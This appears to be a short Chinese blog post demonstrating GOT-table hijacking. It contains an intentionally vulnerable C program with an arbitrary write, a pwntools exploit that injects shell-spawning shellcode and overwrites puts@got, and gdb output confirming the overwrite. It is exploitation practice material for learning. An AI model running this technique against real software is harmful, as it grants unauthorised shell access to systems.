栈溢出-GOT表劫持测试

1、目标程序源代码

char name[64];

int main()
{
int unsigned long long addr;
setvbuf(stdin,0,2,0);
setvbuf(stdout,0,2,0);
printf("What's you name?\n");
read(0,name,0x40);
printf("Where do you want to write?\n");
scanf("%llu",&addr);
printf("Data:");
read(0,(char *)addr,8);
puts("Done!");
printf("Thank you %s!\n",name);
return 0;
}

2、exp代码
from pwn import *

context(arch = 'amd64', os = 'linux')

r=process("./got")
raw_input()
print(r.recvline())

r.send(asm(shellcraft.sh()))

print(r.recvline())

r.sendline(str(0x404018))#send puts address

print(r.recvuntil("Data:"))
raw_input()
r.send(p64(0x404080)) #send name address

r.interactive()

3、调试
a、got表puts函数覆盖前地址
gdb-peda$ x/x 0x404018
0x404018 <puts@got.plt>: 0x00007fa3f4daf5a0
b、got表puts函数覆盖后地址
gdb-peda$ x/x 0x404018
0x404018 <puts@got.plt>: 0x0000000000404080

posted @ 2020-10-20 20:56 S_m_workers 阅读(414) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

S_m_workers

栈溢出-GOT表劫持测试

公告